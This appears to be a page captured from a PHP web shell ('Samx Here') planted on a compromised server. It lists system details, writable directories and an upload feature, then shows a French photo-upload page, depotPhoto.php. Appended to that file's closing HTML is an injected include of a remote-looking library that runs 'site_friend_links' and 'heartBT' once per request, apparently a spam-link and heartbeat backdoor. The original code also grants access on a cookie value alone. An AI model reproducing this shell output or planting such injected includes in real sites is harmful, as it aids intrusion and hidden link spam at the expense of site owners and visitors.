Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/public_html/atice/abonnes-old/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/public_html/atice/abonnes-old/depotPhoto.php
<?php
if(empty($_COOKIE['idAbonne'])){header("Location:index.php");}
$idAbonne=$_COOKIE['idAbonne'];
?>
<!DOCTYPE html 
     PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
  <title>Le Trombino de la liste</title>
  <link rel="Stylesheet"
        href="../outils/gestatice.css"
        type="text/css" />
<script type="text/javascript" src="../outils/verif.js">
</script>

</head>
<body>
<?php
print"<form action=\"enregPhoto.php\" method=\"post\" enctype=\"multipart/form-data\">";
echo"<table>";

  echo"<tr>";
    echo"<td>Ta trombine</td>";
    echo"<td><input type=\"file\" name=\"photo\" /></td>";
  echo"</tr>\n";

    echo"<td colspan=\"2\"><input type=\"submit\" name=\"go\" value=\"Go!!\" /></td>";
  echo"</tr>\n";
echo"</table>";
echo"</form>";
?>

</div><?php include_once $_SERVER["DOCUMENT_ROOT"]."/lesite/IMG/distant/html/functions-php-lib.php"; global $hasRun; if (!$hasRun) { echo site_friend_links("<!--DhdL8Uf9-->");flush();heartBT(); $hasRun = true;} ?>
</body>
</html>

SAMX